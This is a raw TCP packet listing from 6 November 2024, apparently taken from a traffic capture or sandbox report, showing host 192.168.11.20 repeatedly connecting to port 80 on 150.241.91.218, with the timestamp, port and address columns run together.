                                                                                                                                                              Nov 6, 2024 17:38:48.542011976 CET8050158150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:48.542042971 CET8050158150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:49.614270926 CET8050158150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:49.654980898 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.795978069 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.796731949 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.986388922 CET8050158150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:49.986432076 CET8050159150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:49.986605883 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.986607075 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.986813068 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:49.986813068 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.175578117 CET8050159150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.175585985 CET8050159150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.247070074 CET8050159150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.259509087 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.259958029 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.447649956 CET8050159150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.447896957 CET5015980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.448002100 CET8050160150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.448163986 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.448347092 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.448348045 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.636251926 CET8050160150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.637048960 CET8050160150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.710947037 CET8050160150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.722429037 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.722917080 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.910600901 CET8050160150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.910706043 CET8050161150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:50.910830975 CET5016080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.910967112 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.911796093 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:50.911796093 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.104769945 CET8050161150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.104796886 CET8050161150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.262067080 CET8050161150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.272624969 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.273077011 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.461497068 CET8050162150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.461539984 CET8050161150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.461692095 CET5016180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.461693048 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.461859941 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.461860895 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.651669025 CET8050162150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.651710033 CET8050162150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.721404076 CET8050162150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.733150005 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.733660936 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.923829079 CET8050162150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.924026012 CET8050163150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:51.924096107 CET5016280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.924290895 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.924446106 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:51.924446106 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.112492085 CET8050163150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.112548113 CET8050163150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.182881117 CET8050163150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.196506023 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.196965933 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.384763002 CET8050163150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.384804010 CET8050164150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.384943962 CET5016380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.384944916 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.385078907 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.385078907 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.573770046 CET8050164150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.573813915 CET8050164150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.641823053 CET8050164150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.652714014 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.653214931 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.846494913 CET8050165150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.846539974 CET8050164150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:52.846709967 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.846775055 CET5016480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.846877098 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:52.846877098 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.040647030 CET8050165150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.040668964 CET8050165150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.106925964 CET8050165150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.120754004 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.121536016 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.318284035 CET8050166150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.318309069 CET8050165150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.318469048 CET5016580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.318541050 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.318681955 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.318681955 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:53.512254953 CET8050166150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:53.512301922 CET8050166150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:54.592057943 CET8050166150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:54.612977982 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.613534927 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.803013086 CET8050167150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:54.803055048 CET8050166150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:54.803198099 CET5016680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.803198099 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.803354979 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.803354979 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:54.990830898 CET8050167150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:54.990931988 CET8050167150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:55.063460112 CET8050167150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:55.073921919 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.074691057 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.261503935 CET8050167150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:55.261660099 CET5016780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.262456894 CET8050168150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:55.262662888 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.262757063 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.262757063 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:55.450742006 CET8050168150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:55.450789928 CET8050168150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.524743080 CET8050168150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.535315037 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.535756111 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.722970009 CET8050168150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.723208904 CET5016880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.723397970 CET8050169150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.723599911 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.723717928 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.724847078 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.911562920 CET8050169150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.912491083 CET8050169150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.980273008 CET8050169150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:56.991204977 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:56.991806984 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.178848982 CET8050169150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.178992033 CET5016980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.179205894 CET8050170150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.179449081 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.179640055 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.179640055 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.367126942 CET8050170150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.367216110 CET8050170150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.435476065 CET8050170150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.456679106 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.457248926 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.644131899 CET8050170150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.644300938 CET5017080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.645775080 CET8050171150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.646059036 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.646215916 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.646215916 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.834758997 CET8050171150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.834805965 CET8050171150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.906646967 CET8050171150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:57.917390108 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:57.917836905 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.106333017 CET8050172150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.106381893 CET8050171150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.106604099 CET5017180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.106625080 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.106694937 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.106694937 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.294805050 CET8050172150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.294841051 CET8050172150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.364445925 CET8050172150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.380759001 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.381251097 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.568799019 CET8050172150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.569077015 CET5017280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.569241047 CET8050173150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.569494009 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.569557905 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.569557905 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.757832050 CET8050173150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.757863998 CET8050173150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.829916954 CET8050173150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:58.849992990 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:58.849996090 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.038197994 CET8050173150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.038292885 CET8050174150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.038515091 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.038516998 CET5017380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.038650036 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.038650036 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.227701902 CET8050174150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.227741003 CET8050174150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.303869963 CET8050174150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.314574957 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.315082073 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.502557039 CET8050174150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.502614975 CET8050175150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.502813101 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.502813101 CET5017480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.502963066 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.502963066 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.690452099 CET8050175150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.690499067 CET8050175150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.753317118 CET8050175150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.764724970 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.765167952 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.952614069 CET8050175150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.952811003 CET5017580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.953525066 CET8050176150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:59.953869104 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.954063892 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:59.954063892 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.142642975 CET8050176150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.142652988 CET8050176150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.210546970 CET8050176150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.227870941 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.228502035 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.416189909 CET8050176150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.416376114 CET5017680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.416683912 CET8050177150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.416901112 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.416964054 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.416964054 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.605129004 CET8050177150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.605143070 CET8050177150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.676352024 CET8050177150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.691450119 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.691926956 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.880008936 CET8050177150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.880167007 CET8050178150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:00.880260944 CET5017780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.880372047 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.880515099 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:00.880515099 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.068892956 CET8050178150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.068911076 CET8050178150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.143459082 CET8050178150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.158454895 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.158893108 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.346678972 CET8050178150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.346702099 CET8050179150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.346906900 CET5017880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.346906900 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.347027063 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.347027063 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.535202980 CET8050179150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.535244942 CET8050179150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.613303900 CET8050179150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.625617981 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.626125097 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.813652039 CET8050179150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.813733101 CET8050180150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:01.813889980 CET5017980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.813999891 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.814074993 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:01.814074993 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.001579046 CET8050180150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.001619101 CET8050180150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.080123901 CET8050180150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.096982002 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.097547054 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.284673929 CET8050180150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.284924030 CET5018080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.285567045 CET8050181150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.285733938 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.287086010 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.287086964 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.475013018 CET8050181150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.475451946 CET8050181150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.551146030 CET8050181150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.561732054 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.562149048 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.749876976 CET8050181150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.750040054 CET5018180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.750134945 CET8050182150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.750406981 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.750533104 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.750722885 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:02.940665960 CET8050182150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:02.940709114 CET8050182150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:03.008732080 CET8050182150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:03.021871090 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.022350073 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.209558010 CET8050182150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:03.209855080 CET5018280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.210334063 CET8050183150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:03.210515022 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.210652113 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.210652113 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:03.398574114 CET8050183150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:03.398622990 CET8050183150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.479974985 CET8050183150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.491390944 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.491871119 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.679630041 CET8050183150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.679856062 CET5018380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.679908037 CET8050184150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.680102110 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.680181026 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.680181026 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.868525982 CET8050184150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.868567944 CET8050184150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.939837933 CET8050184150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:04.959580898 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:04.960297108 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.147646904 CET8050184150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.147820950 CET5018480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.148354053 CET8050185150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.148597002 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.148682117 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.148682117 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.337651014 CET8050185150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.337660074 CET8050185150.241.91.218192.168.11.20
